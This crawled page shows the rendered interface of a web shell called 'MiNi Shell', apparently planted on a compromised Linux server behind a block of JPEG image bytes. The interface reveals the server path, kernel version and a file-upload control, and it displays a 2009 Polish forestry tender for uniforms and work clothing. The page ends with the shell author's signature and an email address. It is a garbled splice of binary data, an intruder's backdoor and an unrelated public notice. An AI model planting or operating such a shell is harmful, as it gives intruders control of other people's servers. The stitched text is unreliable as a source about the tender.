JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090129/31067-N-2009.html

<p class="kh_header"><b>Łagów: Dostawa sortów mundurowych leśnika oraz odzieży roboczej i obuwia roboczego w roku 2009</b><br>
<b>Numer ogłoszenia: 31067 - 2009; data zamieszczenia: 29.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe - Nadleśnictwo Łagów , Wola Łagowska 118, 26-025 Łagów, woj. świętokrzyskie, tel. 041 3074023, faks 041 3074023.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radom.lasy.gov.pl/lagow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sortów mundurowych leśnika oraz odzieży roboczej i obuwia roboczego w roku 2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.	Nazwa sortu umundurowania	KOD CPV	            J.m.	Ilość
I.	Mundur wyjściowy leśnika	 	 	
1.	Mundur wyjściowy męski	 	 	
             - marynarka	             18230000-0	szt	4
             - spodnie	                          18234000-8	szt	8
2.	Mundur wyjściowy damski	 	 	
	 - marynarka 	             18230000-0	szt	2
	 - spódnica	             18232000-4	szt	2
	 - spodnie	             18234000-8	szt	3
3.	Koszula biała męska z długim rękawem	18332000-5	szt	14
4.	Koszula biała męska z krótkim rękawem18332000-5	szt	15
5.	Bluzka biała damska z długim rękawem	18300000-2	szt	1
6.	Bluzka biała damska z krótkim rękawem18300000-2	szt	1
7.	Krawat	                                       18423000-0	szt	9
8.	Płaszcz wiosenno-jesienny damski 	18212000-8	szt	1
9.	Płaszcz wiosenno-jesienny męski	18212000-8	szt	2
10.	Kapelusz damski	                          18441000-2 	szt	----
11.	Kapelusz męski	                          18441000-2	szt	2
12.	Kurtka zimowa damska 	             18223200-0	szt	1
13.	Kurtka zimowa męska 	             18223200-0  	szt	7
14.	Czapka mundurowa	                          18443320-5	szt	2
15.	Szalik	                                       18422000-3	szt	7
16.	Skarpety	                                       18317000-4	par	80
17.	Półbuty wyjściowe	                          18813200-3	par	21
II.	 Mundur codzienny leśnika			
1.	Koszula męska z długim rękawem	18332000-5	szt	18
2.	Koszula męska z krótkim rękawem	18332000-5	szt	11
3.	Bluzka damska z długim rękawem	18300000-2	szt	---
4.	Bluzka damska z krótkim rękawem	18300000-2	szt	2
5.	Spodnie męskie	                          18234000-8	szt	32
6.	Spódnica	                                       18232000-4	szt	---
7.	Sweter	                                       18235300-8	szt	26
8.	Kamizelka	                                       18235400-9      	szt	14
9.	Bluza z polaru	                          18230000-0	szt	21
10.	Kurtka	                                       18223200-0  	szt	13
11.	Czapka zimowa	                          18443000-6	szt	5
12.	Peleryna 	                                       18211000-1	szt	1
13.	Półbuty codzienne	                          18813200-3	par.	24
III.	Mundur terenowy leśnika			
1.	Ubranie letnie /bluza, spodnie, kamizelka/18410000-6	
Kpl          4
Bluza       1
Spodnie   4
Kamizelka	 1
2.	Ubranie zimowe /kurtka, spodnie/	18410000-6	
Kpl          4
Kurtka      1
Spodnie	  1
3.	Czapka letnia	18443320-5 	szt	10
4.	Czapka zimowa	18443000-6	szt	4
5.	Trzewiki terenowe	18815100-6	par.	21
6.	Rękawice damskie	18424000-7	par.	---
7.	Rękawice męskie	18424000-7	par.	12
8.	Buty Goretex	18815000-5	par.	27
IV.	Oznaki			
1.	Stylizowany wizerunek orła       18420000-9      szt	3
2.	Stylizowana gałązka modrzewia 18420000-9	szt	---
3.	Oznaki identyfikacyjne	    18420000-9	szt	2
4.	Oznaki służbowe	                 18420000-9	szt	2
V.	Odzież i obuwie robocze			
1.	Buty gumowo filcowe	    18812200-6	par.	33
2.	Buty gumowe	                 18812200-6	par.	34
3.	Płaszcz przeciwdeszczowy (kurtka wodochronna) 18221300-7 szt	8
4.	Ubranie letnie	                18410000-6	kpl	1
5.	Ubranie ciepłochronne	   18410000-6	kpl	1
6.	Kamizelka ciepłochronna	   18235400-9      	szt	1
7.	Fartuch stylonowy	                18130000-9	szt	---
8.	Fartuch podgumowany	   18130000-9	szt	---
9.	Chustka na głowę	                18443300-9	szt	---
10.	Trzewiki profilaktyczne	   18815100-6	par.	---
11.	Trzewiki przemysłowe	   18815100-6	par.	---
12.	Czapka letnia typu golfówka	   18443320-5 	szt	---
13.	Torba bhp	                18930000-7	szt	2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 18.20.00.00-1, 18.30.00.00-2, 18.23.40.00-8, 18.23.20.00-4, 18.33.20.00-5, 18.42.30.00-0, 18.21.20.00-8, 18.44.10.00-2, 18.22.32.00-0, 18.44.33.20-0, 18.42.20.00-3, 18.31.70.00-4, 18.81.32.00-3, 18.23.53.00-8, 18.41.00.00-6, 18.42.40.00-7, 18.81.50.00-5, 18.23.54.00-9, 18.93.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy :
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych.
Wykonawca spełni ww. warunek jeśli złoży do oferty następujący dokument:
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)	 Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
Wykonawca spełni ww. warunek jeśli złoży do oferty następujące dokumenty:
      - Wykaz wykonanej jednej dostawy w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającą swoim rodzajem i wartością (minimum 60000,00 zł brutto) dostawom stanowiącą przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie - wg załącznika nr 5 do SIWZ.
 c)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
 d)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
 e)  spełniają wymagania zawarte w SIWZ. 
2. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 8 Specyfikacji Istotnych Warunków Zamówienia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na ofertę składają się następujące dokumenty i załączniki:
1)  formularz oferty  - zał. nr 2 do SIWZ;
2)  kosztorys ofertowy - zał. nr 4 do SIWZ. Należy wyliczyć sumę : wartości netto (kolumna 5), kwoty podatku VAT (kolumna 6), cena brutto (kolumna 7). Przy każdej pozycji należy podać producenta danego przedmiotu umundurowania i odzieży roboczej;
3) oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, wg wzoru - zał. nr 6 do SIWZ;
4) zaświadczenie spełniania wymogów jakościowych w zakresie świadczenia usług
będących przedmiotem zamówienia, potwierdzone posiadaniem Świadectwa
zgodności ze wzorem sortów mundurowych wydanego przez Ośrodek Rozwojowo-Wdrożeniowy Lasów Państwowych w Bedoniu lub ważnego (6 miesiący od daty wystawienia) upoważnienia producenta wystawionego dla dystrybutora  do posługiwania się ww. Świadectwem (dotyczy sortów mundurowych);
5) pełnomocnictwo podmiotów występujących wspólnie wraz z uiszczeniem opłaty skarbowej. 
2. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy, Wykonawca składa następujące dokumenty: 
1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewi?dencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upły?wem terminu składania ofert;
3. W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Wykonawca składa następujące dokumenty: 
1) wykaz wykonanych dostaw w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością (minimum 60000,00 zł brutto) dostawom stanowiącym przedmiot zamówienia  - zał. nr 5 do SIWZ; 
2) dokumenty potwierdzające należyte wykonanie dostaw (opinie, listy polecające, referencje) wykazanych w wykazie wykonanych dostaw;

Do oferty Wykonawca dołączy po jednej sztuce wzoru oferowanego wyrobu oznaczonej nazwą Wykonawcy. Zamawiający zastrzega sobie prawo sprawdzenia jakości dostarczonych wyrobów przez ich naruszenie fizyczne. Wyroby te zostaną zwrócone Wykonawcom po zawarciu umowy. Wzory wyrobów należy dostarczyć do Zamawiajacego w dniu otwarcia ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.radom.lasy.gov.pl/lagow.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Łagów
w Woli Łagowskiej 118
26-025 Łagów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2009 godzina 10:00, miejsce: Osobiście w siedziby Zamawiającego pokój nr 9 lub za pośrednictwem poczty na adres:
Nadleśnictwo Łagów
w Woli Łagowskiej 118
26-025 Łagów.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com